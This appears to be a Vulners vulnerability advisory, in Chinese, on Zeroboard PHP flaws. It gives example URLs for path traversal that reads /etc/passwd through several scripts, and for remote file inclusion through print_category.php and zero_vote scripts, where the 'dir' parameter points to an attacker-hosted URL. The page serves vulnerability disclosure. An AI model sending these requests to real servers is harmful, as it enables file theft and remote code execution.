Vulners
Lucene search
Zeroboard文件泄露远程任意命令执行漏洞
远程用户可以提供包含多个'../'字符的数据作为参数提交给有漏洞的脚本处理,可以WEB进程权限查看任意文件内容:
http://[target]/_head.php?_zb_path=../../../../../etc/passwd%00
http://[target]/include/write.php?dir=../../../../../etc/passwd%00
http://[target]/outlogin.php?_zb_path=../../../../../etc/passwd%00
'print_category.php'脚本没有正确过滤用户提供的'dir'参数,指定远程服务器上的任意PHP文件作为包含文件,可以WEB进程权限执行PHP命令:
http://[target]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/
另外几个zero_vote相关脚本也存在此问题,如:
http://[target]/skin/zero_vote/login.php?dir=http://[attacker]/
http://[target]/skin/zero_vote/setup.php?dir=http://[attacker]/
http://[target]/skin/zero_vote/ask_password.php?dir=http://[attacker]/
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Sep 2009 00:00Current
7.1High risk
Vulners AI Score7.1